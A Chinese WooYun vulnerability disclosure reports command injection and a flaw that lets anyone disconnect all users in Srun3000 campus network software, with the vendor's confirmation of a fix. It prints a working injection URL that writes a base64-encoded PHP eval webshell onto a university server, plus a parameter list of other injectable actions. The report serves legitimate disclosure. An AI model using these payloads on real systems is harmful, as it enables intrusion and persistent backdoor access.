漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-062252
漏洞标题:Srun3000一处越权&命令执行&getshell(实例中影响几万师生数据告急)
相关厂商:srun.com
漏洞作者: HackPanda
提交时间:2014-05-25 17:24
修复时间:2014-08-23 17:26
公开时间:2014-08-23 17:26
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-25: 细节已通知厂商并且等待厂商处理中
2014-05-28: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向第三方安全合作伙伴开放
2014-07-22: 细节向核心白帽子及相关领域专家公开
2014-08-01: 细节向普通白帽子公开
2014-08-11: 细节向实习白帽子公开
2014-08-23: 细节向公众公开
简要描述:
深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的
详细说明:
先看源码,简单粗暴命令执行,但是没给审核,于是就有了后文
漏洞证明:
实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。
根据源码
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic (已删除)
还有越权 可以踢掉所有人。
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=-all
影响数据
ps:这句话一会可以删掉:后面还有几个命令执行的地方每个都需要这样写实例吗?麻烦狗哥了。
注:经测试
action=drop_user1、action=dm_drop_user&sid=、action=rad_drop_user&uname1=、action=rad_drop_user1&uname1=、action=disable_user&uname1=
等 都存在命令执行漏洞 请官方自查
修复方案:
过滤命令执行的地方。
版权声明:转载请注明来源 HackPanda@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-05-28 16:35
厂商回复:
该漏洞为用户自服务漏洞出现在版本14.12,在14.17.5版本中修正。非常感谢
最新状态:
暂无